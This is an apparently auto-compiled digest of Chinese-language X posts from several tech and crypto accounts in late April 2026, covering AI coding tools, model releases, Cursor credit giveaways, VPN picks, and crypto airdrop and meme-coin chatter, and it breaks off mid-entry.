讲了一句让我转身就去打开 Cursor 的话 电子游戏给你的是假奖励真多巴胺 vibe coding 给你的是真奖励真多巴胺 游戏让你卡在能力边缘,但世界是别人造的,迟早通关 vibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的 他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app 他自己也在一个人重做 Airchat 而最难的不是写代码,是知道你…\n[原文链接](https://x.com/GoSailGlobal/status/2049881966850499058)\n\n**[2026-04-30T15:58:18+00:00]**\n> Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub GitHub 第 1299 号用户,注册 18 年,几乎没断过一天 他说写完离别帖,眼泪滴到了键盘上 不是矫情,是 GitHub 真的快不能用了 最近两周连续翻车 1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 2️⃣…\n[原文链接](https://x.com/GoSailGlobal/status/2049881037547999546)\n\n**[2026-04-30T15:25:23+00:00]**\n> ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 Excel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown 操作只有…\n[原文链接](https://x.com/GoSailGlobal/status/2049872749850665004)\n\n**[2026-04-30T14:44:27+00:00]**\n> x.com/i/article/204974126036…\n[原文链接](https://x.com/GoSailGlobal/status/2049862449474740224)\n\n**[2026-04-30T13:24:32+00:00]**\n> RT by @GoSailGlobal: x.com/i/article/204984109084…\n[原文链接](https://x.com/GoSailGlobal/status/2049842340056174762)\n\n**[2026-04-30T09:04:31+00:00]**\n> 今天去咖啡厅办公 旁边桌疑似图拉鼎老哥@tualatrix ,临走前,厚着脸皮去问了下 哈哈😄 加上了图拉鼎老哥,聊了好久\n[原文链接](https://x.com/GoSailGlobal/status/2049776902689153297)\n\n**[2026-04-30T06:27:22+00:00]**\n> 玉伯的好文 永远不要相信“一键生成” 公司全员运营实践\n[原文链接](https://x.com/GoSailGlobal/status/2049737354651590716)\n\n**[2026-04-30T06:11:12+00:00]**\n> 哈哈 去年玩SaaS出海 买了域名,都没上站,已经要到期了🤣\n[原文链接](https://x.com/GoSailGlobal/status/2049733286990352666)\n\n**[2026-04-30T05:36:23+00:00]**\n> R to @GoSailGlobal: 现在打开https://ernie.baidu.com/ 即可体验 突然发现,百度竟然支持google邮箱登陆了,也算是拥抱啦\n[原文链接](https://x.com/GoSailGlobal/status/2049724523218624702)\n\n**[2026-04-30T05:36:19+00:00]**\n> 刚刚,LMArena 有个值得注意的变化 LMArena 最新排名显示:文心 5.1 Preview 以 1476 分拿下文本榜国内第一,成为前十五名中唯一的国产模型,超越 GPT-5.5 、DeepSeek V4等一众国内外主流模型,足以看到文心在文本能力上的积累 即便到了 GPT-5.5 这一代,最核心的能力形态,依然还是文本模型,因为大模型的大部分能力,本质上都是从文本能力\"长出来\"的 1…\n[原文链接](https://x.com/GoSailGlobal/status/2049724507389366513)\n\n**[2026-04-30T05:10:28+00:00]**\n> Agent 自己花钱? OKX 旗下 Onchain OS 发布 Agent Payments Protocol(APP),跨链 Agent 支付的开放标准 一起站台的有起码 24 家:AWS、阿里云、以太坊基金会、Uniswap、Solana、Sui 都在内 1️⃣ Agent 支付要的 4 件事,APP 全包: · 毫秒级到账(Agent 不能等 30 秒确认) · 自主调用(额度内 AI …\n[原文链接](https://x.com/GoSailGlobal/status/2049718003005292558)\n\n**[2026-04-30T03:15:17+00:00]**\n> 4/30 AI 圈速览 • Anthropic 估值冲破 9000 亿美元,新一轮 500 亿融资在路上 • 微软 Nadella 表态:将「充分利用」与 OpenAI 新协议榨取最大价值 • Warp 终端开源,OpenAI 首家赞助;可接 Claude Code / Codex / Gemini CLI • Kimi 2.6 实测:部分场景超 Opus 4.7、前端胜 GPT-5.5,价格只…\n[原文链接](https://x.com/GoSailGlobal/status/2049689014228451360)\n\n**[2026-04-30T03:11:43+00:00]**\n> 🔥 今日新鲜 Skills 精选 Top 10(4月30日) 由 http://agentskillshub.top 整理!发现 69000+ AI Agent 工具,每日更新 🚀 主权派 Agent 抬头 + Memory Agent 趋势成型!!! 1️⃣ 🆕 openclaw/clawsweeper ⭐ 1339 | +0 GitHub Issue/PR 自动巡检:每周扫一遍仓库所有 is…\n[原文链接](https://x.com/GoSailGlobal/status/2049688117712724055)\n\n**[2026-04-29T22:21:25+00:00]**\n> RT by @GoSailGlobal: 感谢关注,完整节目链接: https://youtu.be/CIDVbaXWp64?si=XmOgN-1yDrXeOOO5\n[原文链接](https://x.com/GoSailGlobal/status/2049615062109974893)\n\n**[2026-04-29T17:43:48+00:00]**\n> RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy co…\n[原文链接](https://x.com/GoSailGlobal/status/2049545195914498139)\n\n**[2026-04-29T16:46:34+00:00]**\n> R to @GoSailGlobal: 看到朋友发了他的消息,打开看了下,在搞中转站了😅\n[原文链接](https://x.com/GoSailGlobal/status/2049530795833049270)\n\n**[2026-04-29T16:45:17+00:00]**\n> 傅总真的流量秃鹫,啥火搞啥 看到评论区一片骂声,他其实把你们当助推器,直接block就好了 再晒上我为什么block他,新粉可能不知道 1️⃣ 这账号是编导在运营 2️⃣ 宣称猎豹移动全员编程,还有编程作业,不知道现在咋样了 3️⃣ 抠门,能把我们六位数的报价砍到三位数的人第一次见 4️⃣ 搬运不注明出处 。。。\n[原文链接](https://x.com/GoSailGlobal/status/2049530471013593290)\n\n**[2026-04-29T01:36:27+00:00]**\n> RT by @GoSailGlobal: 看到一个面向 Design Engineer 的 UI Skills 集合站 不过与其说是面向 Design Engineer,更像是面向有 UI/UX,甚至 Remotion 等跟设计、展示、交互、动画相关的设计师和开发者们的。 如果你在找 UI/UX/Remotion/Motion Graphics 等相关 Skills,这个网站可以看看: http…\n[原文链接](https://x.com/GoSailGlobal/status/2049301758036549775)\n\n**[2026-04-28T22:26:54+00:00]**\n> RT by @GoSailGlobal: 我靠!兄弟们?Warp 都要开源了! 官方宣布Warp 正式全面开源啦!🔥 知名现代终端 + Agentic 开发环境 Warp 现在完全开源! • 代码、Roadmap、贡献流程全部开放 • GitHub:https://github.com/warpdotdev/warp • Oz AI agents(GPT 驱动)负责 coding、plannin…\n[原文链接](https://x.com/GoSailGlobal/status/2049254052840812960)\n\n---\n\n### ✅ @frxiaobei — 凡人小北(16 条)\n\n**[2026-04-29T22:32:26+00:00]**\n> RT by @frxiaobei: x.com/i/article/204961669954…\n[原文链接](https://x.com/frxiaobei/status/2049617833370202182)\n\n**[2026-04-29T15:48:47+00:00]**\n> 刚好今天下午跟团队开会,聊到了 Symphony。 过去这段时间团队手搓了一套系统,想解决一个很现实的问题: 别再让产品和技术被各自的工具链锁住了。 现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效…\n[原文链接](https://x.com/frxiaobei/status/2049516252281135554)\n\n**[2026-04-29T14:43:40+00:00]**\n> RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to…\n[原文链接](https://x.com/frxiaobei/status/2049499866217185492)\n\n**[2026-04-28T16:56:00+00:00]**\n> 我现在基本不太直接用 Agent了。 介绍下我的AI 搭档,Finn。 现在大部分情况是 Finn 让 Agent 去干活。 工作流其实挺简单的: 我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。 然后直接丢给 OpenClaw,后面基本就不太管了 这一步挺关键的。 不然你会发现一个很烦的事情: 你要跟一堆 Agent 来回对…\n[原文链接](https://x.com/frxiaobei/status/2049170782170042513)\n\n**[2026-04-28T16:07:28+00:00]**\n> 现在远程面试可以更干脆了。 面试官当甲方出需求, 应聘者打开 Codex / Claude Code, 直接共享屏幕开始干。 半小时什么都看清了。\n[原文链接](https://x.com/frxiaobei/status/2049158565487935850)\n\n**[2026-04-28T15:53:41+00:00]**\n> 雷老板是懂营销的, 本着拿人 token,替人带货的原则, 替 Xiaomi MiMo 喊个话。\n[原文链接](https://x.com/frxiaobei/status/2049155099071750164)\n\n**[2026-04-28T13:41:13+00:00]**\n> 图像类产品现在分两派: 把单次生成做到极致,和把整个视觉工作流跑通。 flowith 明显是后者,还顺手把视频给 seedance 出来了。 关键是底层就是 image2,而且不止这一个模型。 不管底层怎么换,上层工作流都很稳。 单点极致 + 工作流闭环,两派合一。 对我这种普通用户非常有价值。\n[原文链接](https://x.com/frxiaobei/status/2049121762009632774)\n\n**[2026-04-28T05:05:35+00:00]**\n> Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。\n[原文链接](https://x.com/frxiaobei/status/2048991998275965022)\n\n**[2026-04-27T16:45:39+00:00]**\n> RT by @frxiaobei: A completely local agent that lives right inside your browser. Powered by Gemma 4 E2B and WebGPU, it uses native tool calling to: 🔍 Search browsing history 📄 Read and summarize page…\n[原文链接](https://x.com/frxiaobei/status/2048805789788413984)\n\n**[2026-04-27T16:44:03+00:00]**\n> Amazing\n[原文链接](https://x.com/frxiaobei/status/2048805385537306677)\n\n**[2026-04-27T16:32:39+00:00]**\n> OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。 但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。 像极了刚走向社会的二愣子。\n[原文链接](https://x.com/frxiaobei/status/2048802517237350599)\n\n**[2026-04-27T16:24:39+00:00]**\n> OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。 😤 虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。\n[原文链接](https://x.com/frxiaobei/status/2048800504206282887)\n\n**[2026-04-26T19:41:23+00:00]**\n> RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension. We're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more …\n[原文链接](https://x.com/frxiaobei/status/2048487623250063516)\n\n**[2026-04-26T11:39:25+00:00]**\n> RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的! 2:但是甲方需要 4K 图。或者 PSD 图层! 3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。 MD 居然给我做了!改给了我一个分层压缩包! 4:里面的图片居然是 4K 尺寸的! 5:所以我们能通过这个方法获得 GPT 的 4K 图片!\n[原文链接](https://x.com/frxiaobei/status/2048366332639674706)\n\n**[2026-04-26T11:00:35+00:00]**\n> Claude Design 虽好,但是额度不够用啊😮‍💨\n[原文链接](https://x.com/frxiaobei/status/2048356561131905177)\n\n**[2026-04-26T08:35:15+00:00]**\n> RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI\n[原文链接](https://x.com/frxiaobei/status/2048319988826820941)\n\n---\n\n### ✅ @gkxspace — 余温(15 条)\n\n**[2026-04-30T02:35:33+00:00]**\n> 截图软件就推荐 PixPin,功能很丰富: 1、截图一键贴在桌面:当做临时便签,很多博主会用 2、长截图:整个网页/长文档一张图就搞定了 3、OCR:截图文字可拷贝,并且完全本地识别 4、GIF图/录屏:录一段操作、制作GIF图 Win / Mac 都有,而且也免费。\n[原文链接](https://x.com/gkxspace/status/2049679016764833893)\n\n**[2026-04-29T03:09:17+00:00]**\n> 有做 摄影行业 的朋友吗,有个项目想聊一聊😊\n[原文链接](https://x.com/gkxspace/status/2049325117998592311)\n\n**[2026-04-29T01:38:07+00:00]**\n> R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人” 技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作 更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性\n[原文链接](https://x.com/gkxspace/status/2049302176900501544)\n\n**[2026-04-28T14:39:43+00:00]**\n> 刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。 我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。 Claude Code、Skills、OpenClaw,不都在向全自动化发展。 如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。 现在 AI Coding 的能力已经非常非常强了,你做出…\n[原文链接](https://x.com/gkxspace/status/2049136483106230523)\n\n**[2026-04-28T11:08:05+00:00]**\n> 这个 Codex 教程很不错,新手值得一看。 作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。 5 个有用的技巧: ①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。 ②插件是别人给你的能力,skills是你自己造的能…\n[原文链接](https://x.com/gkxspace/status/2049083226463797284)\n\n**[2026-04-28T10:26:08+00:00]**\n> 我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下: 1. Obsidian:用来做内容存档、搭建个人知识库 2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商 3. Codex :最近更新很频繁,体验也越来越好,而且不封号 4. Ghostty:一个非常丝滑的终端,推荐~ 5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽 …\n[原文链接](https://x.com/gkxspace/status/2049072666385006919)\n\n**[2026-04-26T14:41:16+00:00]**\n> 牛逼,卡神又出教程了 4美分/天、KiteSim香港卡,免实名+独享虚拟号 马上跟着教程申请一张!!!\n[原文链接](https://x.com/gkxspace/status/2048412096665145411)\n\n**[2026-04-25T16:04:44+00:00]**\n> R to @gkxspace: agent.creao.ai/signup?ref=Ws…\n[原文链接](https://x.com/gkxspace/status/2048070713601376712)\n\n**[2026-04-25T13:45:29+00:00]**\n> R to @gkxspace: x.com/gkxspace/status/204803…\n[原文链接](https://x.com/gkxspace/status/2048035672078844248)\n\n**[2026-04-25T13:44:55+00:00]**\n> 用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。 简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。 我的提示词: 我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套\n[原文链接](https://x.com/gkxspace/status/2048035527459319854)\n\n**[2026-04-25T13:32:58+00:00]**\n> 生财有术、得到新商学,哪个更好一些 最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下 你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔\n[原文链接](https://x.com/gkxspace/status/2048032521942626343)\n\n**[2026-04-25T06:15:53+00:00]**\n> 去了趟书店,被震惊了,到底谁在买这些书啊😅\n[原文链接](https://x.com/gkxspace/status/2047922526685155786)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @gkxspace: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/204773843982373309…\n[原文链接](https://x.com/gkxspace/status/2047891848908472433)\n\n**[2026-04-24T11:36:13+00:00]**\n> 兄弟们,这个邀请码太难搞了 我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱 ClawEmail :https://claw.163.com/?channel=gkxspace 邀请码:CLAW0799450B9EF5 可以使用两百次,大家快配置一下\n[原文链接](https://x.com/gkxspace/status/2047640751774060771)\n\n**[2026-04-24T01:54:50+00:00]**\n> 歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了 配合刚出的 GPT5.5 和 新版 Codex,简直无敌 https://github.com/op7418/guizang-ppt-skill\n[原文链接](https://x.com/gkxspace/status/2047494444857913663)\n\n---\n\n### ✅ @Stv_Lynn — Steven Lynn(13 条)\n\n**[2026-04-29T23:26:38+00:00]**\n> 今日在大阪,欢迎约饭👋\n[原文链接](https://x.com/Stv_Lynn/status/2049631472693448778)\n\n**[2026-04-29T16:12:16+00:00]**\n> 到香港后发现带的是大陆转英标的插座,崩溃\n[原文链接](https://x.com/Stv_Lynn/status/2049522162411995640)\n\n**[2026-04-27T10:37:36+00:00]**\n> Image\n[原文链接](https://x.com/Stv_Lynn/status/2048713165232644251)\n\n**[2026-04-25T18:40:34+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/quote-bud…\n[原文链接](https://x.com/Stv_Lynn/status/2048109932751560818)\n\n**[2026-04-25T18:40:33+00:00]**\n> R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像\n[原文链接](https://x.com/Stv_Lynn/status/2048109929203212615)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/Stakka\n[原文链接](https://x.com/Stv_Lynn/status/2048109925612851296)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: 2. 继续 push 一下 stekka 之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用 现在发现主流 SOTA 模型已经能很稳定地产出 swift 了 自动化测试也通过 AXE 搞定了✅\n[原文链接](https://x.com/Stv_Lynn/status/2048109922936910037)\n\n**[2026-04-25T18:40:31+00:00]**\n> Cursor 送的 10000 刀,我拿来做了什么 昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录 1. 写了个主页 想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构 (文案请忽略不代表最终效果) 感觉吃上细糠了!\n[原文链接](https://x.com/Stv_Lynn/status/2048109919266852875)\n\n**[2026-04-25T12:08:29+00:00]**\n> RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。 从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工…\n[原文链接](https://x.com/Stv_Lynn/status/2048011261473128477)\n\n**[2026-04-25T05:23:57+00:00]**\n> 忘了说了其实我也有👉👈 感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!\n[原文链接](https://x.com/Stv_Lynn/status/2047909458484040105)\n\n**[2026-04-24T03:37:07+00:00]**\n> R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…\n[原文链接](https://x.com/Stv_Lynn/status/2047520184408371233)\n\n**[2026-04-24T03:36:54+00:00]**\n> DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全 很适合代码场景\n[原文链接](https://x.com/Stv_Lynn/status/2047520130499051872)\n\n**[2026-04-24T03:09:34+00:00]**\n> DeepSeek V4 终于生了!\n[原文链接](https://x.com/Stv_Lynn/status/2047513252171825530)\n\n---\n\n### ✅ @chuxiaeth — 初夏(10 条)\n\n**[2026-04-30T01:50:25+00:00]**\n> ✅好用的VPN梯子推荐 最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。 我自己试下来,目前还算稳定的有三个,分享给大家参考: 1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。 2️⃣ 奶昔——老牌子之一,速度和稳定性…\n[原文链接](https://x.com/chuxiaeth/status/2049667657251934282)\n\n**[2026-04-30T00:46:21+00:00]**\n> 🧠 你以为的币圈财富自由: 在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥 👇 真正的币圈财富自由: 500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵 💥 核心纪律(必须遵守): 1. 亏损 20…\n[原文链接](https://x.com/chuxiaeth/status/2049651534003351701)\n\n**[2026-04-29T04:52:50+00:00]**\n> 🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯 策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊 Tria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=…\n[原文链接](https://x.com/chuxiaeth/status/2049351176433623539)\n\n**[2026-04-28T08:48:42+00:00]**\n> Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。\n[原文链接](https://x.com/chuxiaeth/status/2049048148660965739)\n\n**[2026-04-28T08:38:27+00:00]**\n> 开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。 #TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。\n[原文链接](https://x.com/chuxiaeth/status/2049045566857064461)\n\n**[2026-04-28T08:30:58+00:00]**\n> R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误\n[原文链接](https://x.com/chuxiaeth/status/2049043685094907944)\n\n**[2026-04-28T08:25:44+00:00]**\n> 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海…\n[原文链接](https://x.com/chuxiaeth/status/2049042369530777747)\n\n**[2026-04-26T23:40:41+00:00]**\n> - @RiverdotInc 第五季创作者排名战正式打响🏆 赛季时间:4月22日 → 26年Q2结束📅 这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ 另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 @River4fun 💧 我也已经加入到第五季的战斗\n[原文链接](https://x.com/chuxiaeth/status/2048547844982976544)\n\n**[2026-04-26T23:33:15+00:00]**\n> - @ferra_protocol 居然也上贵金属永续合约了🥇 现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 交互链接: https://ferra.ag?code=tBYQfU0aq 进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀\n[原文链接](https://x.com/chuxiaeth/status/2048545974747070599)\n\n**[2026-04-26T02:36:06+00:00]**\n> 好久不见,宝子们,近来可好啊\n[原文链接](https://x.com/chuxiaeth/status/2048229604784308266)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @wolfyxbt — 杀破狼(15 条)\n\n**[2026-04-27T13:59:57+00:00]**\n> 最近想玩链游的可以看看 @RealGoOfficial 这个游戏 他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。 他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如…\n[原文链接](https://x.com/wolfyxbt/status/2048764088193569049)\n\n**[2026-04-27T01:55:58+00:00]**\n> 不要骂我了,山寨季已经来过了 $TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。 觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。 山寨币是赚钱容易而已,不是所有人都赚钱。\n[原文链接](https://x.com/wolfyxbt/status/2048581892333867398)\n\n**[2026-04-26T04:01:04+00:00]**\n> 嗨 @nikitabier @elonmusk 你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。 我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。\n[原文链接](https://x.com/wolfyxbt/status/2048250984644960630)\n\n**[2026-04-26T02:11:07+00:00]**\n> 卧槽,川普又被枪击了 😱\n[原文链接](https://x.com/wolfyxbt/status/2048223317019316568)\n\n**[2026-04-25T15:08:21+00:00]**\n> 因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。\n[原文链接](https://x.com/wolfyxbt/status/2048056527731454048)\n\n**[2026-04-25T13:32:07+00:00]**\n> R to @wolfyxbt: Image\n[原文链接](https://x.com/wolfyxbt/status/2048032308637442215)\n\n**[2026-04-25T13:30:27+00:00]**\n> 2019 年,孙哥放了巴菲特的鸽子; 2026 年,嗯哼放了特朗普的鸽子。 币圈真是个神奇的地方!\n[原文链接](https://x.com/wolfyxbt/status/2048031889789972748)\n\n**[2026-04-25T10:03:02+00:00]**\n> 虽然比特币回到 77,000 了,但是我还是非常悲观的 我理想中的抄底价格是 35,000 的比特币 感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。 这种底我根本不敢抄呀,抄在半山腰至少得难受一年。 感觉现在这种行情像是跌太…\n[原文链接](https://x.com/wolfyxbt/status/2047979690623955107)\n\n**[2026-04-25T08:01:04+00:00]**\n> 我靠 Cursor 刚刚送了我 10,000 美金的额度! 感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!\n[原文链接](https://x.com/wolfyxbt/status/2047948998250840240)\n\n**[2026-04-25T05:22:04+00:00]**\n> 我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。 平均算下来,每 1 次曝光有 0.000136 美金的收益; 每 1 万次曝光 1.36 美金的收益。\n[原文链接](https://x.com/wolfyxbt/status/2047908983101628720)\n\n**[2026-04-25T03:15:14+00:00]**\n> R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据\n[原文链接](https://x.com/wolfyxbt/status/2047877064104284194)\n\n**[2026-04-25T02:27:20+00:00]**\n> 卧槽!牛逼牛逼! 这两周的工资涨到了 1799 美金! Thank you Elon Musk!\n[原文链接](https://x.com/wolfyxbt/status/2047865010182148284)\n\n**[2026-04-24T13:29:31+00:00]**\n> 我也很爱吃瓜,但我觉得还是得理性吃瓜 昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂 这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。 Tether 一直以来都会联合美国的执法机构…\n[原文链接](https://x.com/wolfyxbt/status/2047669267475419273)\n\n**[2026-04-24T07:56:02+00:00]**\n> SBF 的投资水平:Anthropic、Cursor、SpaceX CZ 的投资水平:SBF\n[原文链接](https://x.com/wolfyxbt/status/2047585341515993543)\n\n**[2026-04-24T03:56:02+00:00]**\n> 看到此推的所有人,现在立刻马上推荐我一个生活好物。\n[原文链接](https://x.com/wolfyxbt/status/2047524944280793505)\n\n---\n\n### ✅ @runes_leo — Leo(20 条)\n\n**[2026-05-01T00:38:00+00:00]**\n> 38k 星的 skill 仓库。 上周抄了 1 个 grill-me,今天又加了另外 2 个。 一个是 /tdd 思路。 动手前先写一行——跑完应该长啥样。 对得上才往下走。 加进自己的自检流程,只用于策略代码或 API 调用那类—— 跑了对不对要 grep log 才知道的场景。 skill 没装,精华抄过来了。 另一个是他 SKILL.md 的渐进式骨架。 照着写了个模板,下次新写 skil…\n[原文链接](https://x.com/runes_leo/status/2050011821352829116)\n\n**[2026-04-30T11:23:46+00:00]**\n> R to @runes_leo: github.com/runesleo/claude-v…\n[原文链接](https://x.com/runes_leo/status/2049811948653752753)\n\n**[2026-04-30T11:23:46+00:00]**\n> 开源视频管线 claude-video-kit 升级 比上一版多了: · 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的) · Remotion / ffmpeg 版本锁定 + 音频标准化配方 · 声纹 ref 改环境变量 · v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双…\n[原文链接](https://x.com/runes_leo/status/2049811945528893682)\n\n**[2026-04-30T10:02:00+00:00]**\n> Warp 开源那天我没换。 为啥?看了眼 license 直接乐了。 repo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。 AGPL 就是那个专门防 AWS 白嫖的协议。 你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——…\n[原文链接](https://x.com/runes_leo/status/2049791371364479224)\n\n**[2026-04-30T07:00:14+00:00]**\n> R to @runes_leo: 完整版(英文 / 3 小时干货): https://www.youtube.com/watch?v=7xTGNNLPyMI 强烈建议看完整版。\n[原文链接](https://x.com/runes_leo/status/2049745624703320340)\n\n**[2026-04-30T07:00:13+00:00]**\n> R to 